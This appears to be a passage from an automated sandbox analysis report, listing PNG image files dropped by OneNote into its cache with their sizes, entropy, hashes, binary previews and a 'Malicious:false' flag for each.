                                                                                                  Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000N.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):14553
                                                                                                  Entropy (8bit):7.951135681293377
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                  MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                  SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                  SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                  SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000O.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):8184
                                                                                                  Entropy (8bit):7.807848176906598
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                  MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                  SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                  SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                  SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000P.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1924
                                                                                                  Entropy (8bit):7.836744258175623
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                  MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                  SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                  SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                  SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000Q.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):11886
                                                                                                  Entropy (8bit):7.946442244439929
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                  MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                  SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                  SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                  SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000R.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2270
                                                                                                  Entropy (8bit):7.845368393313232
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                  MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                  SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                  SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                  SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000S.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):16003
                                                                                                  Entropy (8bit):7.959532793770661
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                  MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                  SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                  SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                  SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000T.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):13241
                                                                                                  Entropy (8bit):7.931391290415517
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                  MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                  SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                  SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                  SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000U.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4190
                                                                                                  Entropy (8bit):7.94161730428269
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                  MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                  SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                  SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                  SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000V.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4081
                                                                                                  Entropy (8bit):7.943373267196131
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                  MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                  SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                  SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                  SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000010.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):22634
                                                                                                  Entropy (8bit):7.974332204835705
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                  MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                  SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                  SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                  SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000011.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):17289
                                                                                                  Entropy (8bit):7.962998633267186
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                  MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                  SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                  SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                  SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000012.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):13737
                                                                                                  Entropy (8bit):7.916899917415529
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                  MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                  SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                  SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                  SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000013.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2332
                                                                                                  Entropy (8bit):7.8822150338370776
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                  MD5:91CB7F1273AA003076401081B8A22237
                                                                                                  SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                  SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
